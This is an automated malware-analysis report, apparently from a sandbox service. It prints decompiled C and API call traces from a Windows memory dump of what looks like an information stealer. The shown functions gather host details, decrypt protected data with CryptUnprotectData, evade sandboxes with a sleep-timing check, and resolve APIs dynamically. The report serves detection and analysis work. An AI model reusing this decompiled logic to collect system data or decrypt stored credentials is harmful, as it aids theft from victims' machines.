Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 2a56f2af6a827d1587e724d2768c321cb93fb18a7b79b0fb4e7ce5913e38825e
Instruction ID: 06601f90d99de1201c94707f9004f7ecf0be7ff875227f7f43fb39f0c96f7dfe
Opcode Fuzzy Hash: 2a56f2af6a827d1587e724d2768c321cb93fb18a7b79b0fb4e7ce5913e38825e
Instruction Fuzzy Hash: 63619BB2904218ABCB14EFA4DC84EDB737CBB48704F0485EDF609A2150EA75E794CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00409930, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409930() {
				void* _v8;
				char _v524;
				int _v528;
				int _v532;
				void* _v536;
				signed int _v540;
				void* _t62;

				_v536 = RtlAllocateHeap(GetProcessHeap(), 0, 0x1f4);
				_v528 = 0;
				_v8 = 0;
				_v532 = GetKeyboardLayoutList(0, 0);
				_v8 = LocalAlloc(0x40, _v532 << 2);
				_v532 = GetKeyboardLayoutList(_v532, _v8);
				_v540 = 0;
				while(_v540 < _v532) {
					GetLocaleInfoA( *(_v8 + _v540 * 4) & 0x0000ffff, 2,  &_v524, 0x200); // executed
					if(_v528 == 0) {
						_t55 = _v536;
						wsprintfA(_v536, 0x41304c,  &_v524);
						_t62 = _t62 + 0xc;
					} else {
						_t55 = _v536;
						wsprintfA(_v536, "%s / %s", _v536,  &_v524);
						_t62 = _t62 + 0x10;
					}
					_v528 = _v528 + 1;
					E0040A230(_t55,  &_v524, 0, 0x200);
					_v540 = _v540 + 1;
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return _v536;
			}

0x0040994d
0x00409953
0x0040995d
0x0040996e
0x00409986
0x0040999a
0x004099a0
0x004099bb
0x004099e9
0x004099f6
0x00409a29
0x00409a30
0x00409a36
0x004099f8
0x004099ff
0x00409a12
0x00409a18
0x00409a18
0x00409a42
0x00409a56
0x004099b5
0x004099b5
0x00409a64
0x00409a6a
0x00409a6a
0x00409a79

APIs

GetProcessHeap.KERNEL32(00000000,000001F4), ref: 00409940
RtlAllocateHeap.NTDLL(00000000), ref: 00409947
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00409968
LocalAlloc.KERNEL32(00000040,?), ref: 00409980
GetKeyboardLayoutList.USER32(?,00000000), ref: 00409994
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004099E9
wsprintfA.USER32 ref: 00409A12
wsprintfA.USER32 ref: 00409A30
LocalFree.KERNEL32(00000000), ref: 00409A6A

Strings

%s / %s, xrefs: 00409A06

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: HeapKeyboardLayoutListLocalwsprintf$AllocAllocateFreeInfoLocaleProcess
String ID: %s / %s
API String ID: 1926057816-2910687431
Opcode ID: 96b3c06acf1a11d82e18ffc3a6de34a4b4d0f0c668b2074481332b6f8ed3fb0e
Instruction ID: 886cf9befce095545ce463ed5712f5bfc037d279e5a2ec848b0da44066f2847b
Opcode Fuzzy Hash: 96b3c06acf1a11d82e18ffc3a6de34a4b4d0f0c668b2074481332b6f8ed3fb0e
Instruction Fuzzy Hash: 69313CB4A8421CEBDB60DF54CC8DBE9B7B4BB44301F1081E9E519A6291CB785F84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00405E20, Relevance: 13.6, APIs: 9, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E20() {
				CHAR* _t1;
				struct HINSTANCE__* _t2;
				CHAR* _t5;
				struct HINSTANCE__* _t7;
				CHAR* _t10;
				struct HINSTANCE__* _t12;
				CHAR* _t15;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HINSTANCE__* _t21;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				CHAR* _t27;
				struct HINSTANCE__* _t28;

				_t1 =  *0x417694; // 0xba4e90
				_t2 = LoadLibraryA(_t1); // executed
				 *0x41781c = _t2;
				if( *0x41781c == 0) {
					return 0;
				}
				_t18 =  *0x4174c8; // 0xbbbcf0
				_t24 =  *0x41781c; // 0x60900000
				 *0x417820 = GetProcAddress(_t24, _t18);
				_t5 =  *0x4170ec; // 0xbb9310
				_t19 =  *0x41781c; // 0x60900000
				 *0x4177d8 = GetProcAddress(_t19, _t5);
				_t25 =  *0x417438; // 0xbbbd38
				_t7 =  *0x41781c; // 0x60900000
				 *0x4177f4 = GetProcAddress(_t7, _t25);
				_t20 =  *0x417418; // 0xbb92d0
				_t26 =  *0x41781c; // 0x60900000
				 *0x417810 = GetProcAddress(_t26, _t20);
				_t10 =  *0x41744c; // 0xbb9510
				_t21 =  *0x41781c; // 0x60900000
				 *0x4177f8 = GetProcAddress(_t21, _t10);
				_t27 =  *0x417674; // 0xbbbc48
				_t12 =  *0x41781c; // 0x60900000
				 *0x417824 = GetProcAddress(_t12, _t27);
				_t22 =  *0x417568; // 0xbb95d0
				_t28 =  *0x41781c; // 0x60900000
				 *0x417800 = GetProcAddress(_t28, _t22);
				_t15 =  *0x4176e8; // 0xbb95f0
				_t23 =  *0x41781c; // 0x60900000
				 *0x417808 = GetProcAddress(_t23, _t15);
				return 1;
			}

0x00405e23
0x00405e29
0x00405e2f
0x00405e3b
0x00000000
0x00405f0b
0x00405e41
0x00405e48
0x00405e55
0x00405e5a
0x00405e60
0x00405e6d
0x00405e72
0x00405e79
0x00405e85
0x00405e8a
0x00405e91
0x00405e9e
0x00405ea3
0x00405ea9
0x00405eb6
0x00405ebb
0x00405ec2
0x00405ece
0x00405ed3
0x00405eda
0x00405ee7
0x00405eec
0x00405ef2
0x00405eff
0x00000000

APIs

LoadLibraryA.KERNEL32(00BA4E90,?,004093B1,?,00405420,?,?,00000104), ref: 00405E29
GetProcAddress.KERNEL32(60900000,00BBBCF0), ref: 00405E4F
GetProcAddress.KERNEL32(60900000,00BB9310), ref: 00405E67
GetProcAddress.KERNEL32(60900000,00BBBD38), ref: 00405E7F
GetProcAddress.KERNEL32(60900000,00BB92D0), ref: 00405E98
GetProcAddress.KERNEL32(60900000,00BB9510), ref: 00405EB0
GetProcAddress.KERNEL32(60900000,00BBBC48), ref: 00405EC8
GetProcAddress.KERNEL32(60900000,00BB95D0), ref: 00405EE1
GetProcAddress.KERNEL32(60900000,00BB95F0), ref: 00405EF9

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 752ccc3ff085376ef8f8fe334bbff5117da588b3ea2ba98a3852fe4fdd7da02c
Instruction ID: c061b472e753055a6e77f7d04fabd340bc329f1be0b0a2d12fea7016a2f47ce1
Opcode Fuzzy Hash: 752ccc3ff085376ef8f8fe334bbff5117da588b3ea2ba98a3852fe4fdd7da02c
Instruction Fuzzy Hash: 9D215DB565D2009FD344EFA8ED88AD67BF9E74C351700D93AA61AC3260D734A846CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409850, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00409850() {
				struct _TIME_ZONE_INFORMATION _v180;
				void* _v184;
				long _v188;
				long _t19;

				_v184 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v180.Bias = 0;
				memset( &(_v180.StandardName), 0, 0xa8);
				_t19 = GetTimeZoneInformation( &_v180); // executed
				_v188 = _t19;
				if(_v188 != 0xffffffff) {
					asm("cdq");
					wsprintfA(_v184, "UTC%d",  ~(_v180.Bias) / 0x3c);
					return _v184;
				}
				return _v184;
			}

0x0040986d
0x00409873
0x0040988b
0x0040989a
0x004098a0
0x004098ad
0x004098bf
0x004098d4
0x00000000
0x004098dd
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409860
RtlAllocateHeap.NTDLL(00000000), ref: 00409867
memset.MSVCRT ref: 0040988B
GetTimeZoneInformation.KERNEL32(00000000), ref: 0040989A
wsprintfA.USER32 ref: 004098D4

Strings

UTC%d, xrefs: 004098C8

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateInformationProcessTimeZonememsetwsprintf
String ID: UTC%d
API String ID: 3127424461-2723047788
Opcode ID: 3f73ba3b26191613cd645b9b50fe95ce8f0db38d9f4c75dea3a4579c84dfb885
Instruction ID: 7862cbf0840c833d8aeb1ddc789c98858c1f187f00e8ec01e0d43b5b56b9f2ef
Opcode Fuzzy Hash: 3f73ba3b26191613cd645b9b50fe95ce8f0db38d9f4c75dea3a4579c84dfb885
Instruction Fuzzy Hash: A40162B0E483289BDB60EB60DD49FA97379AB04305F0041E5B609E72D1DB745F84CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00403C80, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C80(void* __ecx, intOrPtr _a4) {
				long _v8;
				char _v276;
				void* _v280;
				void* _t17;
				intOrPtr _t20;
				void* _t35;

				E0040A270( &_v276, 0x104);
				_t25 = _a4;
				E0040AB50(_t25,  &_v276, E00403BE0(_a4, _t35, _a4));
				_t17 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104); // executed
				_v280 = _t17;
				_v8 = 0;
				VirtualProtect(_v280, 4, 0x100,  &_v8); // executed
				_t20 =  *0x417370; // 0x413050
				E00403940( &_v276, _t20,  &_v280);
				E0040A270( &_v276, 0x104);
				return _v280;
			}

0x00403c95
0x00403c9a
0x00403cae
0x00403cc4
0x00403cca
0x00403cd0
0x00403ce9
0x00403cf6
0x00403d03
0x00403d17
0x00403d25

APIs

Part of subcall function 00403BE0: memset.MSVCRT ref: 00403C02
Part of subcall function 00403BE0: CryptStringToBinaryA.CRYPT32(?,00000000,00000000,?,?), ref: 00403C2E
Part of subcall function 00403BE0: CryptStringToBinaryA.CRYPT32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403C56

GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000104), ref: 00403CBD
RtlAllocateHeap.NTDLL(00000000), ref: 00403CC4
VirtualProtect.KERNEL32(?,00000004,00000100,00000000,?,?,00000104), ref: 00403CE9

Part of subcall function 00403940: new[].LIBCMTD ref: 00403A52

Strings

P0A, xrefs: 00403CF6

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: BinaryCryptHeapString$AllocateProcessProtectVirtualmemsetnew[]
String ID: P0A
API String ID: 841796520-1298182231
Opcode ID: 5ed9565fe5dc59012eabaa2f78d0dbd7e7c7477a37b262c258879c2a6b861dab
Instruction ID: bd3ea2eb87f98809a2356df11b8bcb0a014df0aee56c5cfa85e4a0f0b9a65a24
Opcode Fuzzy Hash: 5ed9565fe5dc59012eabaa2f78d0dbd7e7c7477a37b262c258879c2a6b861dab
Instruction Fuzzy Hash: 880196F5D4020CABDB14FBA0DC47FDE737CAB08705F0045A9B708A6181D6B55B888BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004062D0, Relevance: 4.5, APIs: 3, Instructions: 49
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004062D0(intOrPtr _a4, char _a8, intOrPtr* _a12, long* _a16) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _t21;

				_v16 = _a4;
				_v20 = _a8;
				_t21 =  *0x4178f8( &_v20, 0, 0, 0, 0, 0,  &_v12); // executed
				_v24 = _t21;
				if(_v24 != 0) {
					 *_a16 = _v12;
					 *_a12 = LocalAlloc(0x40,  *_a16);
					if( *_a12 != 0) {
						E0040A210( *_a12, _v8,  *_a16);
					}
				}
				LocalFree(_v8);
				return _v24;
			}

0x004062d9
0x004062df
0x004062f4
0x004062fa
0x00406301
0x00406309
0x0040631c
0x00406324
0x00406336
0x00406336
0x00406324
0x0040633f
0x0040634b

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062F4
LocalAlloc.KERNEL32(00000040,00000000), ref: 00406313
LocalFree.KERNEL32(?), ref: 0040633F

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 48a8db8054f067df00a625ea4098585d2001a64524ea95cb75d55a5f4cc75217
Instruction ID: f4d589785fa83fc08a3bd80fee80bdaa6ae452c302fb50f9c42760d67095a75e
Opcode Fuzzy Hash: 48a8db8054f067df00a625ea4098585d2001a64524ea95cb75d55a5f4cc75217
Instruction Fuzzy Hash: C411CCB4A00209DFDB04DF98D984AAEB7B5FF88300F104569F916A7390D734AE51CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 004097B0, Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004097B0() {
				long _v8;
				void* _v12;

				_v12 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v8 = 0x104;
				GetUserNameA(_v12,  &_v8); // executed
				return _v12;
			}

0x004097ca
0x004097cd
0x004097dc
0x004097e8

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004057A4,JohnDoe), ref: 004097BD
RtlAllocateHeap.NTDLL(00000000), ref: 004097C4
GetUserNameA.ADVAPI32(?,00000104), ref: 004097DC

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 7608ea7f71d81c7e14bbd3d43f1c5593540e05b5a1cce82d1921923ae2d48093
Instruction ID: f6b7b55fca39a9c11596d51f4d2c7424859a2665c4a4adae06f4802ac0f86fd7
Opcode Fuzzy Hash: 7608ea7f71d81c7e14bbd3d43f1c5593540e05b5a1cce82d1921923ae2d48093
Instruction Fuzzy Hash: 29E0ECB594530CBBDB00EFE4DD49ACDBBB8AB08312F0041A5EA49E3290D67156488B55

Uniqueness

Uniqueness Score: -1.00%

Function 00405740, Relevance: 4.5, APIs: 3, Instructions: 18
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405740() {
				long _v8;
				intOrPtr _v12;

				_v8 = GetTickCount();
				Sleep(0x3a98); // executed
				_v12 = GetTickCount() - _v8;
				if(_v12 <= 0x2710) {
					return 0;
				}
				return 1;
			}

0x0040574c
0x00405754
0x00405763
0x0040576d
0x00000000
0x00405778
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405746
Sleep.KERNEL32(00003A98), ref: 00405754
GetTickCount.KERNEL32 ref: 0040575A

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 458a8ecc5650cee3aabe087393b0307435f97acf605cf557e4c0f81286d3dfaa
Instruction ID: 54d35f33046108738d602ac0550f3b0b8453b128d977167fae257bd090c4de79
Opcode Fuzzy Hash: 458a8ecc5650cee3aabe087393b0307435f97acf605cf557e4c0f81286d3dfaa
Instruction Fuzzy Hash: 55E0EC34A0810CEFD700AFB8EA0D59D7BF8EB45302F1041B69806A2290D6784A949B56

Uniqueness

Uniqueness Score: -1.00%

Function 00404760, Relevance: 96.3, APIs: 64, Instructions: 315stringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000F423F,?,?,0040543E,?,?,00000104), ref: 0040476B
RtlAllocateHeap.NTDLL(00000000), ref: 00404772
lstrcat.KERNEL32(?,00BA0570), ref: 00404785
lstrcat.KERNEL32(?,00BA5048), ref: 00404796
lstrcat.KERNEL32(?,0041659C), ref: 004047A5
lstrcat.KERNEL32(?,00BA0580), ref: 004047B6
lstrcat.KERNEL32(?,004165A0), ref: 004047C5
lstrcat.KERNEL32(?,00BAE3D8), ref: 004047D6
lstrcat.KERNEL32(?,0041659C), ref: 004047E5
lstrcat.KERNEL32(?,00BAC098), ref: 004047F6
GetCurrentProcessId.KERNEL32(?,?,0040543E,?,?,00000104), ref: 004047FC

Part of subcall function 0040A4A0: OpenProcess.KERNEL32(00000410,00000000,>T@), ref: 0040A4B4
Part of subcall function 0040A4A0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040A4D5
Part of subcall function 0040A4A0: CloseHandle.KERNEL32(00000000), ref: 0040A4DF

lstrcat.KERNEL32(?,00000000), ref: 00404810
lstrcat.KERNEL32(0041659C,0041659C), ref: 0040481F
lstrcat.KERNEL32(00BAC158,00BAC158), ref: 0040482F

Part of subcall function 004097F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0040483A,?,00000104), ref: 004097FD
Part of subcall function 004097F0: RtlAllocateHeap.NTDLL(00000000), ref: 00409804
Part of subcall function 004097F0: GetLocalTime.KERNEL32(?,?,?,?,?,?,0040483A,?,00000104), ref: 00409811
Part of subcall function 004097F0: wsprintfA.USER32 ref: 0040983E

lstrcat.KERNEL32(00000000,00000000), ref: 0040483F
lstrcat.KERNEL32(004165A0,004165A0), ref: 0040484E
lstrcat.KERNEL32(00BAC1B8,00BAC1B8), ref: 0040485F

Part of subcall function 00409850: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409860
Part of subcall function 00409850: RtlAllocateHeap.NTDLL(00000000), ref: 00409867
Part of subcall function 00409850: memset.MSVCRT ref: 0040988B
Part of subcall function 00409850: GetTimeZoneInformation.KERNEL32(00000000), ref: 0040989A

lstrcat.KERNEL32(00000000,00000000), ref: 0040486F
lstrcat.KERNEL32(0041659C,0041659C), ref: 0040487E
lstrcat.KERNEL32(00BAE158,00BAE158), ref: 0040488F

Part of subcall function 004098F0: GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 00409902

lstrcat.KERNEL32(00000000,00000000), ref: 0040489F
lstrcat.KERNEL32(004165A0,004165A0), ref: 004048AE
lstrcat.KERNEL32(00BAE398,00BAE398), ref: 004048BE

Part of subcall function 00409930: GetProcessHeap.KERNEL32(00000000,000001F4), ref: 00409940
Part of subcall function 00409930: RtlAllocateHeap.NTDLL(00000000), ref: 00409947
Part of subcall function 00409930: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00409968
Part of subcall function 00409930: LocalAlloc.KERNEL32(00000040,?), ref: 00409980
Part of subcall function 00409930: GetKeyboardLayoutList.USER32(?,00000000), ref: 00409994
Part of subcall function 00409930: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004099E9
Part of subcall function 00409930: wsprintfA.USER32 ref: 00409A12
Part of subcall function 00409930: wsprintfA.USER32 ref: 00409A30
Part of subcall function 00409930: LocalFree.KERNEL32(00000000), ref: 00409A6A

lstrcat.KERNEL32(00000000,00000000), ref: 004048CE
lstrcat.KERNEL32(0041659C,0041659C), ref: 004048DD
lstrcat.KERNEL32(00BAC230,00BAC230), ref: 004048EE

Part of subcall function 00409A80: GetSystemPowerStatus.KERNEL32(?), ref: 00409A8A

lstrcat.KERNEL32(00000000,00000000), ref: 004048FE
lstrcat.KERNEL32(004165A0,004165A0), ref: 0040490D
lstrcat.KERNEL32(00BAC260,00BAC260), ref: 0040491E

Part of subcall function 00409AB0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409AC4
Part of subcall function 00409AB0: RtlAllocateHeap.NTDLL(00000000), ref: 00409ACB
Part of subcall function 00409AB0: RegOpenKeyExA.KERNEL32(80000002,00BD2918,00000000,00020119,?), ref: 00409AEB
Part of subcall function 00409AB0: RegQueryValueExA.KERNEL32(?,00BD2498,00000000,00000000,?,000000FF), ref: 00409B0C
Part of subcall function 00409AB0: RegCloseKey.ADVAPI32(?), ref: 00409B16

lstrcat.KERNEL32(00000000,00000000), ref: 0040492E
lstrcat.KERNEL32(004165A0,004165A0), ref: 0040493D
lstrcat.KERNEL32(00BAC248,00BAC248), ref: 0040494D

Part of subcall function 00409B30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409B3D
Part of subcall function 00409B30: RtlAllocateHeap.NTDLL(00000000), ref: 00409B44
Part of subcall function 00409B30: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00409B65
Part of subcall function 00409B30: __aulldiv.LIBCMT ref: 00409B7F
Part of subcall function 00409B30: wsprintfA.USER32 ref: 00409BAB

lstrcat.KERNEL32(00000000,00000000), ref: 0040495D
lstrcat.KERNEL32(004165A0,004165A0), ref: 0040496C
lstrcat.KERNEL32(00BA0590,00BA0590), ref: 0040497D

Part of subcall function 00409BC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409BD4
Part of subcall function 00409BC0: RtlAllocateHeap.NTDLL(00000000), ref: 00409BDB
Part of subcall function 00409BC0: RegOpenKeyExA.KERNEL32(80000002,00BAB588,00000000,00020119,?), ref: 00409BFB
Part of subcall function 00409BC0: RegQueryValueExA.KERNEL32(?,00BC8B88,00000000,00000000,?,000000FF), ref: 00409C1C
Part of subcall function 00409BC0: RegCloseKey.ADVAPI32(?), ref: 00409C26

lstrcat.KERNEL32(00000000,00000000), ref: 0040498D
lstrcat.KERNEL32(00BA5710,00BA5710), ref: 0040499E

Part of subcall function 00409C40: GetCurrentProcess.KERNEL32(00000000), ref: 00409C4F
Part of subcall function 00409C40: IsWow64Process.KERNEL32(00000000), ref: 00409C56

lstrcat.KERNEL32(00000000,00000000), ref: 004049AE
lstrcat.KERNEL32(00BA5720,00BA5720), ref: 004049BF
lstrcat.KERNEL32(004165A0,004165A0), ref: 004049CE
lstrcat.KERNEL32(00BAC0F8,00BAC0F8), ref: 004049DF

Part of subcall function 00409C80: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00409CA0

lstrcat.KERNEL32(00000000,00000000), ref: 004049EF
lstrcat.KERNEL32(004165A0,004165A0), ref: 004049FE
lstrcat.KERNEL32(00BAE1D8,00BAE1D8), ref: 00404A0F

Part of subcall function 00409CB0: CreateDCA.GDI32(00BC4800,00000000,00000000,00000000), ref: 00409CC5
Part of subcall function 00409CB0: GetDeviceCaps.GDI32(?,00000008), ref: 00409CD4
Part of subcall function 00409CB0: GetDeviceCaps.GDI32(?,0000000A), ref: 00409CE3
Part of subcall function 00409CB0: ReleaseDC.USER32(00000000,?), ref: 00409CF2
Part of subcall function 00409CB0: wsprintfA.USER32 ref: 00409D0C

lstrcat.KERNEL32(00000000,00000000), ref: 00404A1F
lstrcat.KERNEL32(0041659C,0041659C), ref: 00404A2E
lstrcat.KERNEL32(00BAC110,00BAC110), ref: 00404A3E

Part of subcall function 00409760: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040976D
Part of subcall function 00409760: RtlAllocateHeap.NTDLL(00000000), ref: 00409774
Part of subcall function 00409760: GetComputerNameA.KERNEL32(?,00000104), ref: 0040978C

lstrcat.KERNEL32(00000000,00000000), ref: 00404A4E
lstrcat.KERNEL32(004165A0,004165A0), ref: 00404A5D
lstrcat.KERNEL32(00BAC0B0,00BAC0B0), ref: 00404A6E

Part of subcall function 004097B0: GetProcessHeap.KERNEL32(00000000,00000104,004057A4,JohnDoe), ref: 004097BD
Part of subcall function 004097B0: RtlAllocateHeap.NTDLL(00000000), ref: 004097C4
Part of subcall function 004097B0: GetUserNameA.ADVAPI32(?,00000104), ref: 004097DC

lstrcat.KERNEL32(00000000,00000000), ref: 00404A7E
lstrcat.KERNEL32(004165A0,004165A0), ref: 00404A8D
lstrcat.KERNEL32(00BAC1A0,00BAC1A0), ref: 00404A9E
lstrcat.KERNEL32(00000000,00000000), ref: 00404AAE
lstrcat.KERNEL32(004165A0,004165A0), ref: 00404ABD
lstrcat.KERNEL32(00BAC140,00BAC140), ref: 00404ACD

Part of subcall function 00409D70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409D84
Part of subcall function 00409D70: RtlAllocateHeap.NTDLL(00000000), ref: 00409D8B
Part of subcall function 00409D70: RegOpenKeyExA.KERNEL32(80000002,00BCDC68,00000000,00020119,?), ref: 00409DAB
Part of subcall function 00409D70: RegQueryValueExA.KERNEL32(?,00BC8AF8,00000000,00000000,?,000000FF), ref: 00409DCC
Part of subcall function 00409D70: RegCloseKey.ADVAPI32(?), ref: 00409DD6

lstrcat.KERNEL32(00000000,00000000), ref: 00404ADD
lstrcat.KERNEL32(004165A0,004165A0), ref: 00404AEC
lstrcat.KERNEL32(00BA5730,00BA5730), ref: 00404AFD

Part of subcall function 00409DF0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00409DFD
Part of subcall function 00409DF0: GetProcessHeap.KERNEL32(00000000,00000064), ref: 00409E0B
Part of subcall function 00409DF0: RtlAllocateHeap.NTDLL(00000000), ref: 00409E12
Part of subcall function 00409DF0: lstrcat.KERNEL32(?,?), ref: 00409E39

lstrcat.KERNEL32(00000000,00000000), ref: 00404B0D
lstrcat.KERNEL32(0041659C,0041659C), ref: 00404B1C
lstrcat.KERNEL32(00BAE1F8,00BAE1F8), ref: 00404B2D
lstrcat.KERNEL32(004165A0,004165A0), ref: 00404B3C

Part of subcall function 00409E60: RegOpenKeyExA.KERNEL32(80000002,00BD2958,00000000,00020019,00000000), ref: 00409EB2

lstrlen.KERNEL32(?,?,?,?,00000104), ref: 00404B52

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Heap$Process$Allocate$Openwsprintf$CloseName$CurrentLocalQueryValue$CapsDeviceKeyboardLayoutListLocaleStatusTimeUser$AllocComputerCreateDefaultDevicesDisplayEnumFileFreeGlobalHandleInfoInformationMemoryModulePowerProfileReleaseSystemWow64Zone__aulldivlstrlenmemset
String ID:
API String ID: 2251464410-0
Opcode ID: fd5c80ee16f714247da92ecb041be666df2de7965c428215112ed25d159dc5dc
Instruction ID: f949362dfa4a5454710de7dc8057fbcdcf75d5baf9904cf8724e2246ff23a8de
Opcode Fuzzy Hash: fd5c80ee16f714247da92ecb041be666df2de7965c428215112ed25d159dc5dc
Instruction Fuzzy Hash: 30C150F6A65205FFD740EBE4ED88DCE7B79AB4C3017118668B215D7260CA34EE44DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00406AD0, Relevance: 45.3, APIs: 30, Instructions: 284stringmemoryfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00406AE5
lstrcat.KERNEL32(?,00413040), ref: 00406AF7

Part of subcall function 0040A400: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040A421

lstrcat.KERNEL32(?,00000000), ref: 00406B0F
CopyFileA.KERNEL32(?,?,00000001), ref: 00406B22
wsprintfA.USER32 ref: 00406B4F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406B9F
RtlAllocateHeap.NTDLL(00000000), ref: 00406BA6
StrCmpCA.SHLWAPI(?,004165AC), ref: 00406C52
lstrcat.KERNEL32(?,00BB2CA0), ref: 00406C79
lstrcat.KERNEL32(?,00BB2D10), ref: 00406C9E
StrCmpCA.SHLWAPI(?,004165AC), ref: 00406CB0
lstrcat.KERNEL32(?,00BB2CA0), ref: 00406CD8
lstrcat.KERNEL32(?,00BB2D10), ref: 00406CFE

Part of subcall function 00405FF0: memset.MSVCRT ref: 00406042
Part of subcall function 00405FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00406091
Part of subcall function 00405FF0: lstrcat.KERNEL32(?,00000000), ref: 004060F7

lstrcat.KERNEL32(?,004165AC), ref: 00406D2E
lstrcat.KERNEL32(?,?), ref: 00406D42
lstrcat.KERNEL32(?,00416BB4), ref: 00406D54
lstrcat.KERNEL32(?,?), ref: 00406D68
lstrcat.KERNEL32(?,00416BB4), ref: 00406D7A
lstrcat.KERNEL32(?,?), ref: 00406D8E
lstrcat.KERNEL32(?,00416BB4), ref: 00406DA0
lstrcat.KERNEL32(?,?), ref: 00406DB4
lstrcat.KERNEL32(?,00416BB4), ref: 00406DC6
lstrcat.KERNEL32(?,?), ref: 00406DDA
lstrcat.KERNEL32(?,00416BB4), ref: 00406DEC
lstrcat.KERNEL32(?,?), ref: 00406E00
lstrcat.KERNEL32(?,00416BB4), ref: 00406E12
lstrcat.KERNEL32(?,00000000), ref: 00406E50
lstrcat.KERNEL32(?,004165A0), ref: 00406E62
lstrlen.KERNEL32(?), ref: 00406E74
DeleteFileA.KERNEL32(?), ref: 00406EC4

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$FileHeap$AllocAllocateCopyCurrentDeleteDirectoryLocalProcessSystemTimelstrlenmemsetwsprintf
String ID:
API String ID: 3067815791-0
Opcode ID: 2504f8cc8202f7b549c46f38d250e645852c3ea2252c13cfa956b807bf0d769c
Instruction ID: 764d608a62c90be12e595c594f5b05fe0a2a242ba813f39473e6b5cf0ec7812d
Opcode Fuzzy Hash: 2504f8cc8202f7b549c46f38d250e645852c3ea2252c13cfa956b807bf0d769c
Instruction Fuzzy Hash: DEB176F5A95218BBDB10EBA4DC8DFDA7778BB48701F0085A8F605A7290C735DA81CF58

